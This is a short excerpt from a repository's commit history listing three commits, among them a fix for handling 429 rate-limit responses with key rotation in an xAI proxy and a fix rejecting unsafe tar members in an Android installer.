03:25:32 -07:00
Aditya Rajesh Gadgil	031983bbf8	fix: limit pre-update state snapshots	2026-05-28 02:45:25 -07:00
sprmn24	4ed482549f	fix(xai-proxy): handle 429 rate-limit responses in proxy retry path get_retry_credential only triggered on 401; a 429 Too Many Requests from xAI was silently streamed back with no key rotation or back-off signal. - server.py: widen retry gate from == 401 to in {401, 429} - xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate to stamp the 1-hour cooldown on the rate-limited key and return the next available credential. Returns None if pool is exhausted.	2026-05-28 02:36:37 -07:00
Dusk1e	aa3466063b	fix(android): reject unsafe tar members in psutil compatibility installer	2026-05-28 02:36:09 -07:00

1 2 3 4 5 ...

2349 commits